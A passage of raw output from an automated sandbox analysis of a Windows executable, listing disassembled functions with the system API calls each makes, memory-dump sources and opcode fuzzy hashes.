                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                            • String ID:
                                                                            • API String ID: 1726766782-0
                                                                            • Opcode ID: 83222f4c63df7e997ce5feac3b83dd155efb879fc6a19bdc36499811ac613e1e
                                                                            • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                            • Opcode Fuzzy Hash: 83222f4c63df7e997ce5feac3b83dd155efb879fc6a19bdc36499811ac613e1e
                                                                            • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                            Function 00441077 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(?,00000000), ref: 004410F9
                                                                            • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                            • ShowWindow.USER32(?,00000000), ref: 00441183
                                                                            • ShowWindow.USER32(?,00000004), ref: 00441192
                                                                            • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                            • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                            • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                            • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                            Function 00442582 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00442597
                                                                              • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                            • GetDesktopWindow.USER32 ref: 004425BF
                                                                            • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                            • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                            • GetCursorPos.USER32(?), ref: 00442624
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                            • String ID:
                                                                            • API String ID: 4137160315-0
                                                                            • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                            • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                            • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                            • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                            Function 00448851 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                            • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                                                                            • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Enable$Show$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 1871949834-0
                                                                            • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                            • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                            • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                            • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                            Function 00449606 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0044961A
                                                                            • SendMessageW.USER32 ref: 0044964A
                                                                              • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                            • _wcslen.LIBCMT ref: 004496BA
                                                                            • _wcslen.LIBCMT ref: 004496C7
                                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                            • String ID:
                                                                            • API String ID: 1624073603-0
                                                                            • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                            • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                            • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                            • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                            Function 004416D1 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                            • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                            • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                            • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                            Function 0045552E Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                                            • String ID:
                                                                            • API String ID: 1640429340-0
                                                                            • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                            • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                            • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                            • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                            Function 00467E5E Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                            • String ID:
                                                                            • API String ID: 3354276064-0
                                                                            • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                            • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                            • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                            • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                            Function 00455080 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                            • String ID:
                                                                            • API String ID: 752480666-0
                                                                            • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                            • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                            • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                            • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                            Function 00455212 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                            • String ID:
                                                                            • API String ID: 3275902921-0
                                                                            • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                            • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                            • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                            • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                            Function 00439326 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                            • CloseHandle.KERNEL32(?), ref: 00439383
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                            • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                            • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                            • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                            • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                            Function 0041415E Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                            • __calloc_crt.LIBCMT ref: 0041419B
                                                                            • __getptd.LIBCMT ref: 004141A8
                                                                            • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                            • __dosmaperr.LIBCMT ref: 00414201
                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1803633139-0
                                                                            • Opcode ID: e16809dd055500cc9d55e52b2a8bb0d222df9b3cc731a1ba011baabe8b5c6d4f
                                                                            • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                            • Opcode Fuzzy Hash: e16809dd055500cc9d55e52b2a8bb0d222df9b3cc731a1ba011baabe8b5c6d4f
                                                                            • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                            Function 004555E0 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                            • String ID:
                                                                            • API String ID: 3275902921-0
                                                                            • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                            • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                            • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                            • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                            Function 004554C0 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32 ref: 004554DF
                                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                            • DestroyWindow.USER32 ref: 00455678
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                            • String ID:
                                                                            • API String ID: 3691411573-0
                                                                            • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                            • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                                                            • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                            • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                                                            Function 0043609C Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                            • String ID:
                                                                            • API String ID: 1814673581-0
                                                                            • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                            • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                            • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                            • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                            Function 00436272 Relevance: 9.1, APIs: 6, Instructions: 59sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                            • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                            • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                            • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                            Function 004471EC Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                            • LineTo.GDI32(?,?,?), ref: 00447227
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                            • LineTo.GDI32(?,?,?), ref: 0044723D
